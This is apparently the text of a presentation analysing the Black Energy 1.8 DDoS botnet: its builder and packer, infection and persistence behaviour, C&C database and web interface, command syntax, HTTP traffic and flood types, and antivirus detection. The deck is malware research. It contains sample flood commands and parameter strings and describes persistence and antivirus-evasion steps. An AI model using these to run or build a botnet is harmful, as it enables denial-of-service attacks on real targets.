2. Agenda Background What’s In The Package? Building The Backdoor Infection Analysis Command and Control System Architecture Botnet Communication Attacks Analysis Defensive Measures Conclusions Demo
3. Background A little bit of background… Web-based distributed denial of service (DDoS) botnet Probably developed by one or more Russian hackers Version 1.8 seems to be the most recent Has been hosted in Malaysia and Russia and actively used against Russian targets Communication is entirely based on HTTP The command and control (C&C) system is based on PHP language and Mysql database Version 1.7 was sold for 40 USD in Russian hacker forums Version 1.8 has been downloaded from download.xakepok.org after visiting affiliate links
4. What’s in the package? The package format… The package comes in a rar archive (blackenergy18.rar). Package listings Bot files: builder.exe builds two versions of the same backdoor (encrypted and unencrypted) crypt.exe is required by builder.exe to encrypt the backdoor cadt.dll is required by crypt.exe to encrypt the backdoor
5. What’s in the package? The C&C files: db.sql is the Mysql database structure of the C&C system www directory contains all PHP scripts used by the C&C index.php is the main C&C web interface page. stat.php – core HTTP communication engine of the botnet. It receives and send responses. flags folder contains flag icons used to identify bot country config.php is the C&C interface config file. common.php – common php functions used by the C&C components cmdhelp.html – command listings and help syntax in Russian language Net folder contains GeoIP.php application used to associate bot IP to a country
6. Building the backdoor Builder.exe creates two backdoor executables. Some interesting options:
7. Building the backdoor Output results… The _bot.exe is created within the same folder where builder.exe is located. _bot.exe is the decrypted backdoor version. crypted__bot.exe is the encrypted/packed version (according to some AV, the packer is “Stalin”). Both executables are fully functional. crypter.exe is automatically invoked by builder.exe and packs _bot.exe with Stalin. This is used to defeat AV detection and reverse engineering. The backdoor decrypted file size is 23040 bytes The backdoor encrypted/packed file size is 12871 bytes
8. Infection Analysis Infection scenario… Black Energy backdoor does not exploit any vulnerability in the OS system. The victim needs to execute the malware in order to be infected. The infection is typically triggered by the victim downloading and executing the backdoor from fake online games web sites.
9. Infection Analysis - Methodology Before proceeding to the analysis of the backdoor, let’s spend some words about the methodology Dynamic and Static analysis: To properly analyse the infection, the backdoor need to be tested in a controlled environment In this way, it is possible to “detect” changes that affect the controlled environment Dynamic Analysis involves deploying multiple sensors into the environment to detect changes caused by the backdoor activity Static Analysis involves use of reverse engineering tools to control the code execution of the backdoor It is recommended to use both methods when analysing any malware. Dynamic analysis tend to produce “false positives” as many factors are analysed at the same time. Some of them may not be related to the backdoor activity. For this reason, the analyst should always confirm the results with static analysis and vice versa.
10. Infection Analysis – Dynamic/Static Analysis Dynamic Analysis Overview Scope: Analysis of local system interaction using multiple tools Any changes to the following components must be detected: Windows Register File System Memory/Processes Network Traffic Static Analysis Overview Scope: Full deep analysis of the disassembly code of the backdoor executable A deep analysis of the PE structure and disassembly code to understand how the backdoor interact with Register, Windows API, Windows DLLs and what functions are called, what operations are performed, what packer is used.
11. Dynamic Analysis – Tools The environment and the monitor tools in the dynamic analysis: VMware image of WinXP with SP2 – this is the controlled environment where the infection has been analysed VMware image of Ubuntu running LAMP environment to host the C&C system Regmon.exe – tool used to monitor any changes on the Windows Register Filemon.exe – any file system activities is recorded by this tool Diskmon.exe – any disk activity is recorded by this tool SysInternals Process Explorer – like windows task manager tool + additional features Rapier (Rapid Assessment & Potential Incident Examination Report) is a framework that makes use of multiple tools to audit the entire OS Wireshark and tcpdump – network analyser and sniffer
12. Dynamic Analysis – Windows Register Tool: regmon.exe Two Windows Register keys have been created and one modified. [HKEY_LOCAL_MACHINEYSTEMurrentControlSetervicessupdate] [HKEY_LOCAL_MACHINEYSTEMontrolSet001ervicessupdate] [HKEY_LOCAL_MACHINEYSTEMurrentControlSetervicesFDarameters]
13. Dynamic Analysis – File System Tools: Rapier with WinAudit and Chksum, filemon.exe A new file called mssrv32.exe is created in C:indowsystem32 File size is 12780 bytes. Other files added with the infection: 4c380647cca89aacd29ed5f7430b2151 _BOT.EXE-160375AD.pf Filemon.exe is used to list all files activities in the system.
14. Dynamic Analysis – File System The following file system activities are related to the creation of mssrv32.exe: Note that the mssrv32.exe is the same size of _bot.exe .
15. Dynamic Analysis – Network/Processes Tools: Tcpview, Rapier + Network Module + GDIProcs, WinAudit Tcpview output: A process without name is identified by Tcpview. It starts a TCP connection with source port 1035 to destination port 80. 192.168.0.34 is the C&C master server in this instance. The properties of the process shows a connection between the botnet and svchost.exe.
16. Dynamic Analysis – Network/Processes Rapier with Network Netstat result: (192.168.1.1 is the C&C server) Rapier with Network module result: Rapier network module runs different scans. All the information gathered allows to identify the PID associated to the process, the source/destination port, the protocol and the executable associated. These results are confirmed by the GDI Procs scan analysis as well:
17. Dynamic Analysis – Network/Processes WinAudit Result: Note that there is no information associated to Process Description and Process Manufacturer
18. Static Analysis – Reversing malware The environment and the monitor tools in the static analysis: VMware image of WinXP with SP2 – this is the controlled environment where the infection has been analysed VMware image of Ubuntu running LAMP environment to host the C&C system Ollydbg – Freeware Windows Debugger – this has been used with builder.exe, crypt.exe, _bot.exe, crypted__bot.exe, cdat.dll files IDA Pro – Commercial Windows Debugger – this has been used with _bot.exe file PEID – PE Tool analyser – this has been used with builder.exe, crypt.exe, _bot.exe, crypted__bot.exe, cdat.dll files
19. Static Analysis – Reversing malware Before analysing the disassembly code, information about the PE structure, imports and exports should be analysed Let’s dump basic headers and imports/export entries in the malware executable. Export table only contains a reference to start function which is the OEP (Original Execution Point). Imports are mainly related to the following APIs and DLLs:
20. Static Analysis – Reversing malware Some interesting functions imported:
21. Static Analysis – Reversing malware Backdoor Installation When the program is first launched, it runs some checks to see whether it has already been installed, and if not it installs itself. This is done by calling GetModuleFileName to obtain the primary executable’s file name If nothing is found, it copies itself to C:INDOWSYSTEM32ssrv32.exe
22. Static Analysis – Reversing malware The backdoor cannot delete the executable while it is running. The program had to launch a new instance, terminate the first one, and delete the original file from this new instance. The backdoor proceeds to create a mutex called {F3532CE1-0832-11B1-920A-25000A276A73}. The purpose of this mutex is to make sure no other instances of the program are already running; the program terminates if the mutex already exists. This mechanism ensures that the program doesn’t try to infect the same host twice.
23. Static Analysis – Reversing malware During the installation, the backdoor interacts with the Windows Register. The following is an example of registry creation to establish the backdoor as a system service that will be run at each system boot: The following registry value is added to disable Windows raw socket security checks (this enable the backdoor to launch network DDoS):
24. Static Analysis – Reversing malware After creating mssrv32.exe, it create a svchost.exe process. In then delete _bot.exe.
25. Static Analysis – Reversing malware Botnet communication Then it starts to communicate with the server through POST request.
26. Static Analysis – Reversing malware Crypted__bot.exe – some words about to defeat the protector used by Black Energy Some AV identify the packer as “Stalin” but no information is available about this packer. Crypt.exe creates an executable file which contains the encrypted backdoor at section 13112000 . At VA 131110A1 there is a call to the function 131111B9. This function includes multiple sub functions which perform bitwise operations to decrypt the backdoor into memory. The decrypted backdoor is then copied in clear text byte per byte to the memory address 00320000. Size of the memory allocated for the backdoor decrypted is 6000 bytes. The memory can then be dumped to an executable file with ollydump plug-in or the OEP can be changed. It is then needed to use tool like ImpRec to rebuild the Import/Exports table of the dumped file. LordPE can then be used to optimise the code.
27. Static Analysis – Reversing malware Finding the OEP of the backdoor decrypted… Crypted _bot.exe is stored at 13112000 Crypted_.131111b9 decrypts _bot.exe to 00320000 Note that the different size: 6000 and 3000
28. C&C System Architecture Command and Control System architecture requires: Mysql Server Any web server supporting PHP and PHP-Mysql The C&C is ideal for vulnerable LAMP environments Mysql Database Overview – the database is composed by three tables: Files – id, url, dnum, dtotal, country Opt – name, value Stat – id, build_id, files, ip, last, country, country_full Files table is associated to the downloader function. The URL variable contains the URL from which the backdoor can fetch and launch another executable. Not clear how this function works. It might be used for “updating” the botnet. A cross reference field is also present in the stat table (files).
29. C&C System Architecture The Opt Table store the commands list: attack_mode – a numerical value for the type of attack (default, drop by socket, drop by timeout) cmd – the command to send to the bot http_freq – how many requests per second to send in HTTP GET flood mode http_threads – how many program threads to create for the HTTP flood icmp_freq – how many ICMP packets to send in an ICMP attack mode icmp_size – how large of ICMP packets to send in ICMP attack mode max_sessions – for ‘drop by timeout’ spoof_ip – Boolean, used in raw packet flooding attacks syn_freq – how frequently to send packets during a TCP SYN flood tcpudp_freq – how often to send TCP or UDP traffic tcp_size – how large the TCP packets should be udp_size – how large the UDP packets should be ufreq – how long (in minutes) to wait before checking for another command
30. C&C System Architecture This is the opt table after a flood http localhost command sent to the bot:
31. C&C System Architecture The Stat table contains all the statistics of the botnet: ID is built from the system’s SMB hostname and the System Volume ID from the C:drive of the infected machine build_id is the string value set by builder.exe (can be changed at the building time) Files is a reference to the files table. Last is a time value in the format of time() and measures the bot heartbeat Country and country_full are used by the web interface to display the relative country flag of the bot
32. C&C System Architecture C&C system web interface (index.php) From here, commands can be sent and stat can be accessed.
33. C&C System Architecture Sending the commands to the zombie… The command entered through the web interface (index.php) is saved into the database (table opt). The bot performs regular POST requests to http://c&cserver/stat.php or whatever URL value set at the building time. These requests are performed in order to receive commands from the master server. If the zombie is not able to connect to the master server, it will then automatically execute the command specified at the building time (by default -> wait). Wait set a counter after which the zombie will retry to connect to the master server.
34. C&C System Architecture stat.php is responsible to retrieve commands from the database and then output them in base64 format.
35. C&C System Architecture Commands Available: Refresh Rate – change the refresh rate Flood – Network DDoS attacks icmp - a basic ICMP ping flood syn - a basic TCP SYN flood udp - a basic UDP traffic flood http - an HTTP GET request flooder. data - a basic binary packet flooder dns – a DNS request flooder Wait – the bot process is put to sleep for x seconds and then re-perform the POST request to receive new commands. Stop – stop any attack currently running. Die – this deletes the backdoor on the infected machine
36. C&C System Architecture Commands Syntax: flood http 192.168.1.1 index.htm flood icmp 192.168.2.2 index.php flood syn 192.168.3.2 Multiple Commands can be specified using semicolon: dns; icmp; http; syn; 192.168.1.1#15#xHOST Normally, DDoS options are passed in the command syntax as well: '10;2000;10;0;0;30;100;3;20;1000;2000#wait#10#xHOST’ In order: ICMP frequency, ICMP packet size, SYN frequency, spoof IP or not (Boolean value), the attack mode, the maximum number of HTTP sessions, the HTTP connection frequency, the number of HTTP threads, the TCP and UDP frequency, the UDP size, TCP packet size and the bot id.
37. Botnet Communication Botnet communication from a network perspective: Tools: tcpdump and wireshark. HTTP POST request from bot: Note that the bot id and build_id are passed in the POST request. These are needed by the master to identify the bot. HTTP Response from Master Server: Command -> 10;2000;10;0;0;30;100;3;20;1000;2000#stop#1#
38. DDoS Attacks Overview DDoS Attacks with flood command overview Flood udp – this attack involves sending malformed UDP packets. Source and destination port are random. Flood ICMP – this attack send IP ICMP Request to the target with a payload of 1480 bytes (this value can be changed arbitrarily)
39. DDoS Attacks Overview Flood HTTP – this involves GET requests to the specified URL on the command syntax. Flood Data – this send UDP malformed packet with invalid length. Payload size varies for each packet and random data is appended in the payload. Source and destination port are random for each packet.
40. Defenses and Countermeasures AV Detection – both _bot.exe and crypted__bot.exe have been analysed. Some AV still fail to identify black energy backdoor. Some AV identify the backdoor as a downloader instead. The service that has been used is provided by virustotal.com _bot.exe results available here: http://www.virustotal.com/analisis/c88ba95b30d2fe50bc612ab73b922fc2 Crypted_bot.exe results available here: http://www.virustotal.com/analisis/12cc7b4378f7ce90963232423590068b
43. Defenses and Countermeasures Backdoor Variants: Three different backdoor variants have been identified. The variants differentiate by the POST data sent to the C&C master server. First variant: The first uses a simple two-part data string to communicate with the web server, presenting the bot host ID and the build ID using two different variables Second variant: uses only one variable, ‘data’, to submit this information, and separates these two values with a colon (‘:’) Third variant: the same values (bot ID and build_ID) + SOCKS/HTTP proxy address.
44. Conclusions Black energy botnet package is not difficult to obtain C&C system is trivial to install and can be easily installed in any compromised LAMP environment C&C system is easy to use and manage (script-kiddies style) Some AV still do not detect the Black Energy backdoor although it is there since mid 2007. Black Energy Version 1.7 has been released in summer 2007. Version 1.8 has been released in November. Probably a new version will come out soon. Main difference between version 1.7 and version 1.8 is the web interface and the downloader feature. It is unclear today what could be the next variants or versions of the Black energy botnet package. The current information available suggest that Black Energy botnet next version will be easier to use and will include additional features.
45. Demo Time for a Demo! Demo in VMware environments Only 2 hosts: C&C master server – Ubuntu 6.10 + LAMP – 192.168.1.1 Bot Machine: WinXP with SP2 – 192.168.1.2